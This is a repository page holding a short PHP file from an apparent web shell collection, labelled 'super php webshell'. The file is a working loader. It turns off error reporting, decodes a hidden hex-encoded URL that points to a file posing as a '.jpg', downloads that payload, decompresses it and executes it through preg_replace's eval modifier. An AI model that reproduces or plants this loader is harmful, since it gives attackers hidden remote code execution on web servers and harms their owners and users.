webshell/php/blackbin/v1/make2.php
tennc 3097d20015 add blackbin for php webshell
super php webshell
2014-03-20 14:26:07 +08:00

3 lines
No EOL
353 B
PHP

<?php
error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
?>